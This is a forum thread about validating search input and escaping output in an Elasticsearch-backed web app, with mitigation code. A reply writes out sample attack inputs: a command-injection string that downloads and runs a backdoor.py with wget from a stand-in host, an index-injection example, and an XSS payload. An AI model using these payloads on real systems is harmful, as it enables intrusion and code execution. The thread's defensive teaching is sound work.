Should I escape or validate query terms before using the es client?

Fernando_Cesar · May 27, 2019, 10:20pm

Hi,
I'm trying out ES with a simple project: a web page with a search box (similar to Google's) and a backend ES client that sends the query terms to the search engine.

So I receive "XPTO" from the web form, and I use the ES client to query the index. I'm using the simplified query format.

Although "you shall validate the input" is the rule, I'm thinking I don't have to here: "XPTO" is just the input to the query, so the ES client should do the validation. Besides, my knowledge of ES is limited (as is everyone's), so ES itself would really be the one to do this kind of validation and escaping (if necessary).

Even if I change the analyzer and allow more symbols than the standard one does, I would not know what to escape. How would I do that?

I'm also thinking I should validate the ES response before showing it in the web page, escaping it for HTML and JavaScript.

Am I missing some security concern here?
Thanks for your thoughts (and messages).

ikakavas · May 28, 2019, 5:40am

Short answer: Yes, you should probably do both input validation and output sanitization.

Input Validation

You should always assume there will be malicious users. The payload won't always be "XPTO". Depending on which client you use and how you use the user input to build your queries, there are attack vectors that can be dangerous. Take a simplistic case: you want to allow access only to cesar_* indices, and your web app takes the user input (e.g. "xpto") and feeds it to curl to get all documents of the cesar_xpto index. With the command template

curl -uelastic:password -X GET "localhost:9200/cesar_{}/_search"

the command becomes

curl -uelastic:password -X GET "localhost:9200/cesar_xpto/_search"

What happens if the user specifies xpto,.security as the input? The request then becomes

curl -uelastic:password -X GET "localhost:9200/cesar_xpto,.security/_search"

and the user gets access to the documents of the internal security index. As I said, this is a very simplistic example, and in this case a more interesting attack vector would be command injection (e.g. an attacker using " && wget http://a.b.com/backdoor.py && chmod +x backdoor.py && ./backdoor.py as input), but I just wanted to illustrate a possibility.
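A minimal sketch of the input-validation side for this example, written in Python since that is the client stack used later in the thread. It assumes that index suffixes only ever need lowercase letters, digits, underscores and hyphens (an assumption for this app, not an Elasticsearch rule), so anything else, including the comma and dot in xpto,.security, is rejected before any URL or client call is built. INDEX_PREFIX and index_for are hypothetical names.

```python
import re

INDEX_PREFIX = "cesar_"  # prefix from the example above

# Hypothetical allowlist: lowercase letters, digits, underscore and hyphen only.
# Commas, dots, wildcards and slashes are rejected, so input such as
# "xpto,.security" cannot smuggle a second index or path segment into the request.
_SAFE_SUFFIX = re.compile(r"[a-z0-9_-]{1,64}")


def index_for(user_input: str) -> str:
    """Return the index name for a user-supplied suffix, or raise ValueError."""
    if not _SAFE_SUFFIX.fullmatch(user_input):
        raise ValueError(f"invalid index suffix: {user_input!r}")
    return INDEX_PREFIX + user_input


if __name__ == "__main__":
    print(index_for("xpto"))  # cesar_xpto
    for bad in ["xpto,.security", "xpto/../_all", "*", ""]:
        try:
            index_for(bad)
        except ValueError as exc:
            print("rejected:", exc)
```

Allowlisting what is permitted is usually easier to get right than trying to enumerate every dangerous character.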

If you use, e.g., the Java High Level REST Client to build your queries, you'll be much safer from injection attacks in the ES layer, but your application might still be susceptible to other attack types. You should also think about DoS attacks, where users might run multiple consecutive expensive queries and cause CPU/memory starvation in your ES cluster.
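One way to stay on the safe side with any high-level client is to keep the user's text as a plain JSON value inside a match query, which analyzes it as ordinary words instead of parsing query syntax out of it. The Python sketch below builds such a search body. The field name content, the 200-character limit, the page-size cap of 50 and the 2s timeout are all hypothetical values; the caps are there to make expensive requests a little harder to trigger. With elasticsearch-dsl, Search().query("match", ...) should produce an equivalent match query.

```python
import json

MAX_TERM_LENGTH = 200     # hypothetical limit on the raw search text
MAX_PAGE_SIZE = 50        # hypothetical cap on hits per request
SEARCH_FIELD = "content"  # hypothetical field name


def build_search_body(term: str, size: int = 10) -> dict:
    """Build a search body in which the user's text is only ever a JSON value."""
    term = term.strip()
    if not term or len(term) > MAX_TERM_LENGTH:
        raise ValueError("search term is empty or too long")
    return {
        # match analyzes the text as plain words; it does not parse operators,
        # wildcards or field names out of it.
        "query": {"match": {SEARCH_FIELD: {"query": term}}},
        # Cap the page size and the per-shard search time to limit expensive requests.
        "size": max(1, min(size, MAX_PAGE_SIZE)),
        "timeout": "2s",
    }


if __name__ == "__main__":
    body = build_search_body('xpto" OR * && wget http://a.b.com/backdoor.py')
    print(json.dumps(body, indent=2))
```

Because the body is serialized as JSON (by json.dumps here, or by the client), quotes and operators in the input stay inside the query value and cannot break out of the request structure.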

Output Sanitization

Elasticsearch returns JSON responses (i.e. with the HTTP response header content-type: application/json; charset=UTF-8). That means that even if ES returns (reflects) portions of the query, which it does in some error cases, there is no danger of reflected XSS, because the browser will not interpret the response as HTML. However, if you take the response and present it to the user in the context of a web app, things change. For instance:

curl -uelastic:password -X GET 'localhost:9200/something<img%20src=x%20onerror=alert(1)>'

will get the following response from Elasticsearch:

{"error":{"root_cause":[{"type":"index_not_found_exception","reason":"no such index","index_uuid":"_na_","resource.type":"index_or_alias","resource.id":"something<img src=x onerror=alert(1)>","index":"something<img src=x onerror=alert(1)>"}],"type":"index_not_found_exception","reason":"no such index","index_uuid":"_na_","resource.type":"index_or_alias","resource.id":"something<img src=x onerror=alert(1)>","index":"something<img src=x onerror=alert(1)>"},"status":404}

Now if you take this and put it as-is in the response page of your web app without escaping it, the browser will render the <img src=x onerror=alert(1)> element, and its onerror handler will execute in the user's browser. Again, just an example.
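On the output side, the fix is to escape every value taken from an Elasticsearch response before inserting it into HTML. Below is a minimal sketch using Python's standard html.escape; the render_error helper and the trimmed error body are hypothetical, modeled on the response above. Note that html.escape only covers HTML text and attribute contexts. Values placed inside a script block or a JavaScript string need a different encoding, and a template engine with autoescaping enabled handles the HTML case for you.

```python
import html
import json

# Hypothetical error body, modeled on the reflected index name shown above.
es_response = json.loads(
    '{"error": {"type": "index_not_found_exception", "reason": "no such index",'
    ' "index": "something<img src=x onerror=alert(1)>"}, "status": 404}'
)


def render_error(response: dict) -> str:
    """Build an HTML fragment, escaping every value that came from Elasticsearch."""
    error = response.get("error", {})
    reason = html.escape(str(error.get("reason", "unknown error")))
    index = html.escape(str(error.get("index", "")))
    return f"<p>Search failed: {reason} ({index})</p>"


if __name__ == "__main__":
    print(render_error(es_response))
    # <p>Search failed: no such index (something&lt;img src=x onerror=alert(1)&gt;)</p>
```

The reflected markup now reaches the browser as inert text instead of an img element.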

Least Privilege Principle

Another thing worth noting is that you should not run all the queries as a superuser (e.g. the elastic user). Figure out the least privileges your users will need, create a role that has those privileges, assign the role to a service account user, and use that user to make the requests to Elasticsearch via the client. This way, even if a user finds a way to trick your application logic, the impact they can have on your Elasticsearch cluster will be contained.
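As a sketch of what such a role could look like for the cesar_* example: the dicts below are request bodies for the security API's create-role and create-user endpoints (PUT _security/role/<name> and PUT _security/user/<name> in 7.x), which you could send with curl or your client. The role name and the password are hypothetical placeholders. The read index privilege allows searches and gets but no indexing or deletes.

```python
import json

ROLE_NAME = "cesar_search_reader"  # hypothetical role name

# Body for PUT _security/role/cesar_search_reader
role_body = {
    "cluster": [],  # no cluster-level privileges
    "indices": [
        {
            "names": ["cesar_*"],    # only the application's indices
            "privileges": ["read"],  # search/get; no indexing, deletes or admin
        }
    ],
}

# Body for PUT _security/user/<service user name>; the password is a placeholder
# and should come from a secret store in a real deployment.
user_body = {
    "password": "change-me",
    "roles": [ROLE_NAME],
}

if __name__ == "__main__":
    print(json.dumps(role_body, indent=2))
    print(json.dumps(user_body, indent=2))
```

The application then authenticates as this service user instead of elastic, so a request like the xpto,.security one above would be denied even if it slipped past validation.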

Hope this helps

Fernando_Cesar · May 28, 2019, 9:27am

Hi ikakavas! Thanks for the detailed answer!

In fact, I'm using the high-level Python client: https://elasticsearch-dsl.readthedocs.io/en/latest/

But I think I face the same concerns as with the Java one.

So the next logical question is: what should I escape? I didn't find any documentation about that in the client's docs. The DoS attack is easier to deal with, as it is not ES-specific; escaping, however, is. And how would that change if I changed the default analyzer (allowing some special characters in the database and in the queries)? Are there any guidelines or documentation about input validation or escaping that I could follow?
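For what it's worth, escaping is about the query parser's syntax, not the analyzer. The query_string parser handles reserved characters before any analysis happens, so changing the analyzer does not change what needs escaping. Escaping only lets a term like C++ reach the analyzer intact, and whether it then matches depends on how the analyzer tokenized the indexed text. The Elasticsearch query_string documentation lists the reserved characters as + - = && || > < ! ( ) { } [ ] ^ " ~ * ? : \ / and notes that < and > cannot be escaped at all, only removed. Below is a minimal Python sketch of that rule; escape_query_string is a hypothetical helper, not part of elasticsearch-dsl. It does not neutralize AND/OR/NOT or whitespace, so if users should not write query syntax at all, a match query avoids escaping entirely. simple_query_string, for its part, has a smaller operator set and ignores invalid syntax instead of returning an error.

```python
import re

# Reserved characters of the query_string syntax (per the Elasticsearch docs).
# && and || are covered by escaping each & and | individually.
_RESERVED = re.compile(r'([+\-=&|!(){}\[\]^"~*?:\\/])')
# "<" and ">" cannot be escaped in query_string, so they are stripped instead.
_UNESCAPABLE = re.compile(r"[<>]")


def escape_query_string(term: str) -> str:
    """Return user text with query_string operators escaped (hypothetical helper)."""
    term = _UNESCAPABLE.sub("", term)
    # Prefix each reserved character with a backslash.
    return _RESERVED.sub(r"\\\1", term)


if __name__ == "__main__":
    print(escape_query_string("C++ (beta)"))    # C\+\+ \(beta\)
    print(escape_query_string("a<b>c"))         # abc
    print(escape_query_string("title:xpto/*"))  # title\:xpto\/\*
```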

Thanks in advance.

Fernando_Cesar · June 2, 2019, 12:47am

Does anyone know of such documentation?

Fernando_Cesar · June 6, 2019, 11:17pm

Or does it depend on the analyzer?

Fernando_Cesar · June 21, 2019, 6:41pm

Bump

system · July 19, 2019, 6:41pm

This topic was automatically closed 28 days after the last reply. New replies are no longer allowed.

